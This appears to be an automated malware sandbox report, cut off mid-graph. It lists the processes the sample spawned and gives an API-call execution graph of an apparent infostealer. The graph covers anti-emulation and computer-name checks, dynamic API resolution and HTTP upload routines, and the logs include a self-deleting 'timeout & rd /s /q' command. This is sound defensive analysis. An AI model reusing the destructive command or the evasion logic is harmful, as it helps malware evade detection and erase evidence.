                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                                                Start time:01:31:31
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                                                Start time:01:31:35
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                Start time:01:31:35
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                                                Start time:01:31:36
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                Start time:01:31:36
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                                                                Start time:01:32:04
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit
                                                                                                                                                                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                                                Start time:01:32:04
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                                                Start time:01:32:04
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                Imagebase:0x860000
                                                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                                                                Start time:01:32:31
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:32%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                  Signature Coverage:7.7%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                                  execution_graph 12419 4185c0 12420 4185c2 12419->12420 12433 418610 GetModuleHandleA 12420->12433 12422 4185c9 12437 401090 15 API calls 12422->12437 12428 4185e7 12452 4011f0 GetPEB 12428->12452 12434 4187e6 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 12433->12434 12436 418628 12433->12436 12435 418840 12434->12435 12435->12422 12436->12434 12790 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 12437->12790 12439 401135 strcmp 12440 401143 12439->12440 12441 401156 12439->12441 12791 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12440->12791 12445 401000 GetCurrentProcess VirtualAllocExNuma 12441->12445 12443 401148 strcmp 12443->12441 12444 401160 ExitProcess 12443->12444 12446 401087 ExitProcess 12445->12446 12447 40102f VirtualAlloc 12445->12447 12448 40104b 12447->12448 12449 401083 12448->12449 12450 401058 memset VirtualFree 12448->12450 12451 401170 GetPEB 12449->12451 12450->12449 12451->12428 12453 401210 12452->12453 12454 401216 lstrcmpiW 12453->12454 12455 401229 GetPEB 12453->12455 12454->12453 12456 401224 12454->12456 12457 401240 12455->12457 12481 417270 12456->12481 12458 401246 lstrcmpiW 12457->12458 12459 401259 GetPEB 12457->12459 12458->12456 12458->12457 12460 401270 12459->12460 12461 401276 lstrcmpiW 12460->12461 12462 401289 GetPEB 12460->12462 12461->12456 12461->12460 12463 4012a0 12462->12463 12464 4012a6 lstrcmpiW 12463->12464 12465 4012b9 GetPEB 12463->12465 12464->12456 12464->12463 12466 4012d0 12465->12466 12467 4012e6 GetPEB 12466->12467 12468 4012d6 lstrcmpiW 12466->12468 12469 401300 12467->12469 12468->12456 12468->12466 12470 401316 12469->12470 12471 401306 lstrcmpiW 12469->12471 12792 4011b0 GetPEB 12470->12792 12471->12456 12471->12469 12474 4011b0 2 API calls 12475 40132e 12474->12475 12475->12456 12476 4011b0 2 API calls 12475->12476 12477 40133c 12476->12477 12477->12456 12478 4011b0 2 API calls 12477->12478 12479 40134a 12478->12479 12479->12456 12480 4011b0 2 API calls 12479->12480 12480->12456 12482 417280 12481->12482 12796 4101c0 12482->12796 12488 4172aa 12489 410340 3 API calls 12488->12489 12490 4172b9 12489->12490 12805 410290 12490->12805 12492 4172c1 12493 4172dd OpenEventA 12492->12493 12494 4172f4 12493->12494 12495 4172eb CloseHandle 12493->12495 12496 417305 CreateEventA 12494->12496 12495->12492 12497 4101c0 lstrcpyA 12496->12497 12498 417321 12497->12498 12809 410240 lstrlenA 12498->12809 12501 410240 2 API calls 12502 417373 12501->12502 12813 4188e0 12502->12813 12506 417546 12507 410290 lstrcpyA 12506->12507 12508 41754e 12507->12508 12509 4101c0 lstrcpyA 12508->12509 12510 417567 12509->12510 12511 410340 3 API calls 12510->12511 12512 41757c 12511->12512 12851 4102e0 12512->12851 12515 410290 lstrcpyA 12516 417591 12515->12516 12517 4175aa CreateDirectoryA 12516->12517 12855 410200 12517->12855 12520 410200 lstrcpyA 12521 4175d2 12520->12521 12522 410200 lstrcpyA 12521->12522 12523 4175de 12522->12523 12524 410200 lstrcpyA 12523->12524 12525 4175f4 12524->12525 12859 416b40 12525->12859 12527 417619 12528 410290 lstrcpyA 12527->12528 12529 417627 12528->12529 12530 410290 lstrcpyA 12529->12530 12531 41763b 12530->12531 12532 410290 lstrcpyA 12531->12532 12533 417658 12532->12533 12534 410290 lstrcpyA 12533->12534 12535 417663 12534->12535 12536 417670 InternetOpenA 12535->12536 12904 410530 12536->12904 12538 417694 InternetOpenA 12539 410200 lstrcpyA 12538->12539 12540 4176c7 12539->12540 12541 4101c0 lstrcpyA 12540->12541 12542 4176d7 12541->12542 12905 410540 GetWindowsDirectoryA 12542->12905 12545 410200 lstrcpyA 12546 4176ec 12545->12546 12922 402aa0 12546->12922 12548 4176f3 13064 4132f0 12548->13064 12550 417700 12551 4101c0 lstrcpyA 12550->12551 12552 41772e 12551->12552 12553 410200 lstrcpyA 12552->12553 12554 417737 12553->12554 12555 410200 lstrcpyA 12554->12555 12556 417743 12555->12556 12557 410200 lstrcpyA 12556->12557 12558 41774f 12557->12558 12559 410200 lstrcpyA 12558->12559 12560 417765 12559->12560 13084 403920 12560->13084 12562 417786 13270 412d50 12562->13270 12564 4177a0 12565 4101c0 lstrcpyA 12564->12565 12566 4177be 12565->12566 12567 410200 lstrcpyA 12566->12567 12568 4177ca 12567->12568 12569 410200 lstrcpyA 12568->12569 12570 4177d6 12569->12570 12571 410200 lstrcpyA 12570->12571 12572 4177e2 12571->12572 12573 410200 lstrcpyA 12572->12573 12574 4177f8 12573->12574 12575 403920 50 API calls 12574->12575 12576 417816 12575->12576 13311 412a90 12576->13311 12578 417830 12579 4101c0 lstrcpyA 12578->12579 12580 41784e 12579->12580 12581 410200 lstrcpyA 12580->12581 12582 41785a 12581->12582 12583 410200 lstrcpyA 12582->12583 12584 417866 12583->12584 12585 410200 lstrcpyA 12584->12585 12586 417872 12585->12586 12587 410200 lstrcpyA 12586->12587 12588 417888 12587->12588 12589 403920 50 API calls 12588->12589 12590 4178a6 12589->12590 13360 412c40 12590->13360 12592 4178c0 12593 410200 lstrcpyA 12592->12593 12594 4178d6 12593->12594 12595 410200 lstrcpyA 12594->12595 12596 4178e2 12595->12596 12597 410200 lstrcpyA 12596->12597 12598 4178ee 12597->12598 12599 410200 lstrcpyA 12598->12599 12600 417904 12599->12600 13368 413510 12600->13368 12602 417920 12603 410200 lstrcpyA 12602->12603 12604 417953 12603->12604 12605 410200 lstrcpyA 12604->12605 12606 41795f 12605->12606 12607 410200 lstrcpyA 12606->12607 12608 41796b 12607->12608 12609 410200 lstrcpyA 12608->12609 12610 417981 12609->12610 13714 40e440 12610->13714 12790->12439 12791->12443 12793 4011d0 12792->12793 12794 4011e0 12793->12794 12795 4011d6 lstrcmpiW 12793->12795 12794->12456 12794->12474 12795->12793 12795->12794 12797 4101ce 12796->12797 12798 4101ea 12797->12798 12799 4101e2 lstrcpyA 12797->12799 12800 410340 lstrlenA 12798->12800 12799->12798 12802 41036e 12800->12802 12801 410390 12804 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12801->12804 12802->12801 12803 410380 lstrcpyA lstrcatA 12802->12803 12803->12801 12804->12488 12806 4102a4 12805->12806 12807 4102ce 12806->12807 12808 4102c6 lstrcpyA 12806->12808 12807->12492 12808->12807 12810 410258 12809->12810 12811 410280 12810->12811 12812 410278 lstrcpyA 12810->12812 12811->12501 12812->12811 12814 418d02 9 API calls 12813->12814 12841 4188ed 12813->12841 12815 418e04 12814->12815 12816 418d9b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12814->12816 12817 418e11 8 API calls 12815->12817 12818 418ebc 12815->12818 12816->12815 12817->12818 12819 418ec5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12818->12819 12820 418f2e 12818->12820 12819->12820 12821 418f37 6 API calls 12820->12821 12822 418fb6 12820->12822 12821->12822 12823 418fc3 9 API calls 12822->12823 12824 419084 12822->12824 12823->12824 12825 4190f6 12824->12825 12826 41908d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12824->12826 12827 419126 12825->12827 12828 4190ff GetProcAddress GetProcAddress 12825->12828 12826->12825 12829 419156 12827->12829 12830 41912f GetProcAddress GetProcAddress 12827->12830 12828->12827 12831 419163 10 API calls 12829->12831 12832 41923a 12829->12832 12830->12829 12831->12832 12833 419243 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12832->12833 12834 419296 12832->12834 12833->12834 12835 4192b0 12834->12835 12836 41929f GetProcAddress 12834->12836 12837 4192b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12835->12837 12838 41930c 12835->12838 12836->12835 12837->12838 12839 419315 GetProcAddress 12838->12839 12840 417538 12838->12840 12839->12840 12842 4113b0 12840->12842 12841->12814 12843 4101c0 lstrcpyA 12842->12843 12844 4113c7 12843->12844 12845 4101c0 lstrcpyA 12844->12845 12846 4113d3 GetSystemTime 12845->12846 12847 411462 12846->12847 12849 4113f3 12846->12849 12847->12506 12848 41143d lstrlenA 12848->12849 12849->12847 12849->12848 13760 4103a0 12849->13760 12853 41030a 12851->12853 12852 410330 12852->12515 12853->12852 12854 41031e lstrcpyA lstrcatA 12853->12854 12854->12852 12856 410215 12855->12856 12857 410229 12856->12857 12858 410221 lstrcpyA 12856->12858 12857->12520 12858->12857 12860 416b59 12859->12860 12861 410240 2 API calls 12860->12861 12862 416b6f 12861->12862 12863 410240 2 API calls 12862->12863 12886 416b7b 12863->12886 12864 416c63 lstrlenA 12864->12886 12865 4101c0 lstrcpyA 12866 416daa 12865->12866 13806 410500 StrCmpCA 12866->13806 12868 416db5 12873 416dc2 Sleep 12868->12873 12874 416e3c 12868->12874 12869 416c7c strstr 12870 416c8e strstr 12869->12870 12869->12886 12870->12886 12871 4101c0 lstrcpyA 12871->12886 12872 410240 2 API calls 12872->12886 12876 410200 lstrcpyA 12873->12876 12875 410200 lstrcpyA 12874->12875 12877 416e4a 12875->12877 12878 416ddf 12876->12878 12879 410200 lstrcpyA 12877->12879 12880 410200 lstrcpyA 12878->12880 12881 416e58 12879->12881 12882 416dee 12880->12882 12881->12527 12883 410200 lstrcpyA 12882->12883 12884 416dfa 12883->12884 12885 410200 lstrcpyA 12884->12885 12887 416e10 12885->12887 12886->12864 12886->12869 12886->12871 12886->12872 12889 410200 lstrcpyA 12886->12889 12892 410290 lstrcpyA 12886->12892 12894 416d6e 12886->12894 12903 416d94 12886->12903 13765 416910 12886->13765 13776 4169c0 12886->13776 13807 410500 StrCmpCA 12886->13807 12888 416b40 30 API calls 12887->12888 12890 416e32 12888->12890 12889->12886 12890->12881 12892->12886 12895 410240 2 API calls 12894->12895 12896 416d78 12895->12896 12897 410240 2 API calls 12896->12897 12899 416d82 12897->12899 12900 410290 lstrcpyA 12899->12900 12901 416d8b 12900->12901 12902 410290 lstrcpyA 12901->12902 12902->12903 12903->12865 12904->12538 12906 410566 GetVolumeInformationA 12905->12906 12908 4105ba 12906->12908 12909 410607 GetProcessHeap HeapAlloc 12908->12909 12910 410625 wsprintfA lstrcatA 12909->12910 12911 4106d6 12909->12911 13849 410700 GetCurrentHwProfileA 12910->13849 12912 4101c0 lstrcpyA 12911->12912 12914 4106e6 12912->12914 12914->12545 12915 410671 12916 410686 lstrlenA 12915->12916 12917 410695 12916->12917 13865 411e60 malloc strncpy 12917->13865 12919 4106a3 12920 4101c0 lstrcpyA 12919->12920 12921 4106cd 12920->12921 12921->12914 12923 410200 lstrcpyA 12922->12923 12924 402ac9 12923->12924 12925 402790 5 API calls 12924->12925 12926 402ad6 12925->12926 12927 4101c0 lstrcpyA 12926->12927 12928 402ae7 12927->12928 12929 4101c0 lstrcpyA 12928->12929 12930 402af4 12929->12930 12931 4101c0 lstrcpyA 12930->12931 12932 402b01 12931->12932 12933 4101c0 lstrcpyA 12932->12933 12934 402b0e 12933->12934 12935 4101c0 lstrcpyA 12934->12935 12936 402b1b 12935->12936 12937 402b28 InternetOpenA StrCmpCA 12936->12937 12938 403002 InternetCloseHandle 12937->12938 12939 402b57 12937->12939 12944 403017 12938->12944 12940 4113b0 4 API calls 12939->12940 12941 402b65 12940->12941 12942 4102e0 2 API calls 12941->12942 12943 402b75 12942->12943 12946 410290 lstrcpyA 12943->12946 12945 410200 lstrcpyA 12944->12945 12957 40302b 12945->12957 12947 402b7e 12946->12947 12948 410340 3 API calls 12947->12948 12949 402b9c 12948->12949 12950 410290 lstrcpyA 12949->12950 12951 402ba4 12950->12951 12952 410340 3 API calls 12951->12952 12953 402bb8 12952->12953 12954 410290 lstrcpyA 12953->12954 12955 402bc0 12954->12955 12956 4102e0 2 API calls 12955->12956 12958 402bd3 12956->12958 12957->12548 12959 410290 lstrcpyA 12958->12959 12960 402bdb 12959->12960 12961 410340 3 API calls 12960->12961 12962 402bef 12961->12962 12963 410290 lstrcpyA 12962->12963 12964 402bf7 12963->12964 12965 410340 3 API calls 12964->12965 12966 402c0b 12965->12966 12967 410290 lstrcpyA 12966->12967 12968 402c13 12967->12968 12969 410340 3 API calls 12968->12969 12970 402c2d 12969->12970 12971 4102e0 2 API calls 12970->12971 12972 402c3b 12971->12972 12973 410290 lstrcpyA 12972->12973 12974 402c44 12973->12974 12975 402c56 InternetConnectA 12974->12975 12975->12938 12976 402c96 HttpOpenRequestA 12975->12976 12977 402cd5 12976->12977 12978 402ff8 InternetCloseHandle 12976->12978 12979 402ce2 InternetSetOptionA 12977->12979 12980 402cfa 12977->12980 12978->12938 12979->12980 12981 410340 3 API calls 12980->12981 12982 402d0a 12981->12982 12983 410290 lstrcpyA 12982->12983 12984 402d12 12983->12984 12985 4102e0 2 API calls 12984->12985 12986 402d25 12985->12986 12987 410290 lstrcpyA 12986->12987 12988 402d2d 12987->12988 12989 410340 3 API calls 12988->12989 12990 402d41 12989->12990 12991 410290 lstrcpyA 12990->12991 12992 402d49 12991->12992 12993 410340 3 API calls 12992->12993 12994 402d5d 12993->12994 12995 410290 lstrcpyA 12994->12995 12996 402d65 12995->12996 12997 410340 3 API calls 12996->12997 12998 402d79 12997->12998 12999 410290 lstrcpyA 12998->12999 13000 402d81 12999->13000 13001 410340 3 API calls 13000->13001 13002 402d95 13001->13002 13003 410290 lstrcpyA 13002->13003 13004 402d9d 13003->13004 13005 4102e0 2 API calls 13004->13005 13006 402db0 13005->13006 13007 410290 lstrcpyA 13006->13007 13008 402db8 13007->13008 13009 410340 3 API calls 13008->13009 13010 402dcc 13009->13010 13011 410290 lstrcpyA 13010->13011 13012 402dd4 13011->13012 13013 410340 3 API calls 13012->13013 13014 402de8 13013->13014 13015 410290 lstrcpyA 13014->13015 13016 402df0 13015->13016 13017 4102e0 2 API calls 13016->13017 13018 402e00 13017->13018 13019 410290 lstrcpyA 13018->13019 13020 402e08 13019->13020 13021 410340 3 API calls 13020->13021 13022 402e1c 13021->13022 13023 410290 lstrcpyA 13022->13023 13024 402e24 13023->13024 13025 410340 3 API calls 13024->13025 13026 402e38 13025->13026 13027 410290 lstrcpyA 13026->13027 13028 402e40 13027->13028 13029 410340 3 API calls 13028->13029 13030 402e54 13029->13030 13031 410290 lstrcpyA 13030->13031 13032 402e5c 13031->13032 13033 410340 3 API calls 13032->13033 13034 402e70 13033->13034 13035 410290 lstrcpyA 13034->13035 13036 402e78 13035->13036 13037 4102e0 2 API calls 13036->13037 13038 402e8b 13037->13038 13039 410290 lstrcpyA 13038->13039 13040 402e93 13039->13040 13041 4101c0 lstrcpyA 13040->13041 13042 402ea9 13041->13042 13043 4102e0 2 API calls 13042->13043 13044 402eb7 13043->13044 13045 4102e0 2 API calls 13044->13045 13046 402ec3 13045->13046 13047 410290 lstrcpyA 13046->13047 13050 402ecb 13047->13050 13048 402ef8 lstrlenA 13048->13050 13049 402f15 lstrlenA 13049->13050 13050->13048 13050->13049 13051 402f32 Sleep 13050->13051 13052 402f73 InternetReadFile 13050->13052 13053 402f50 13051->13053 13054 402f43 13051->13054 13055 402f90 13052->13055 13056 402fe1 InternetCloseHandle 13052->13056 13057 4101c0 lstrcpyA 13053->13057 13054->13050 13054->13053 13055->13056 13062 402f97 13055->13062 13058 402ff2 13056->13058 13059 402f5d 13057->13059 13058->12978 13059->12957 13060 410340 3 API calls 13060->13062 13061 410290 lstrcpyA 13061->13062 13062->13056 13062->13060 13062->13061 13063 402fc3 InternetReadFile 13062->13063 13063->13056 13063->13062 13870 410530 13064->13870 13066 41330f StrCmpCA 13067 413323 13066->13067 13068 41331b ExitProcess 13066->13068 13069 41332a strtok_s 13067->13069 13070 413345 13069->13070 13071 4134f6 13069->13071 13072 413360 strtok_s 13070->13072 13073 4133a0 StrCmpCA 13070->13073 13074 4134b3 StrCmpCA 13070->13074 13075 413452 StrCmpCA 13070->13075 13076 413475 StrCmpCA 13070->13076 13077 413384 StrCmpCA 13070->13077 13078 413494 StrCmpCA 13070->13078 13079 4133d8 StrCmpCA 13070->13079 13080 4133bc StrCmpCA 13070->13080 13081 41340c StrCmpCA 13070->13081 13082 41342f StrCmpCA 13070->13082 13083 410240 2 API calls 13070->13083 13071->12550 13072->13070 13072->13071 13073->13070 13073->13072 13074->13070 13075->13070 13075->13072 13076->13070 13077->13070 13077->13072 13078->13070 13079->13070 13079->13072 13080->13070 13080->13072 13081->13070 13081->13072 13082->13070 13082->13072 13083->13070 13085 410200 lstrcpyA 13084->13085 13086 403949 13085->13086 13087 402790 5 API calls 13086->13087 13088 403956 13087->13088 13089 4101c0 lstrcpyA 13088->13089 13090 403965 13089->13090 13091 4101c0 lstrcpyA 13090->13091 13092 403972 13091->13092 13093 4101c0 lstrcpyA 13092->13093 13094 40397f 13093->13094 13095 4101c0 lstrcpyA 13094->13095 13096 40398c 13095->13096 13097 4101c0 lstrcpyA 13096->13097 13098 403999 13097->13098 13099 4039a7 InternetOpenA StrCmpCA 13098->13099 13100 404010 InternetCloseHandle 13099->13100 13101 4039d6 13099->13101 13103 404021 13100->13103 13102 4113b0 4 API calls 13101->13102 13104 4039e4 13102->13104 13873 407790 lstrlenA 13103->13873 13105 4102e0 2 API calls 13104->13105 13107 4039f9 13105->13107 13109 410290 lstrcpyA 13107->13109 13114 403a01 13109->13114 13110 410240 2 API calls 13111 404042 13110->13111 13113 410340 3 API calls 13111->13113 13112 404081 13116 410200 lstrcpyA 13112->13116 13115 404055 13113->13115 13118 410340 3 API calls 13114->13118 13117 410290 lstrcpyA 13115->13117 13132 403f5d 13116->13132 13119 40405d 13117->13119 13120 403a23 13118->13120 13122 404064 GetProcessHeap HeapFree 13119->13122 13121 410290 lstrcpyA 13120->13121 13123 403a2b 13121->13123 13122->13112 13124 410340 3 API calls 13123->13124 13125 403a3f 13124->13125 13126 410290 lstrcpyA 13125->13126 13127 403a47 13126->13127 13128 4102e0 2 API calls 13127->13128 13129 403a57 13128->13129 13130 410290 lstrcpyA 13129->13130 13131 403a5f 13130->13131 13133 410340 3 API calls 13131->13133 13132->12562 13134 403a73 13133->13134 13135 410290 lstrcpyA 13134->13135 13136 403a7b 13135->13136 13137 410340 3 API calls 13136->13137 13138 403a8f 13137->13138 13139 410290 lstrcpyA 13138->13139 13140 403a97 13139->13140 13141 410340 3 API calls 13140->13141 13142 403ab1 13141->13142 13143 4102e0 2 API calls 13142->13143 13144 403abd 13143->13144 13145 410290 lstrcpyA 13144->13145 13146 403ac8 13145->13146 13147 403ad9 InternetConnectA 13146->13147 13147->13100 13148 403b19 HttpOpenRequestA 13147->13148 13149 404006 InternetCloseHandle 13148->13149 13150 403b5c 13148->13150 13149->13100 13151 403b63 InternetSetOptionA 13150->13151 13152 403b7b 13150->13152 13151->13152 13153 410340 3 API calls 13152->13153 13154 403b91 13153->13154 13155 410290 lstrcpyA 13154->13155 13156 403b99 13155->13156 13157 4102e0 2 API calls 13156->13157 13158 403bac 13157->13158 13159 410290 lstrcpyA 13158->13159 13160 403bb4 13159->13160 13161 410340 3 API calls 13160->13161 13162 403bc8 13161->13162 13163 410290 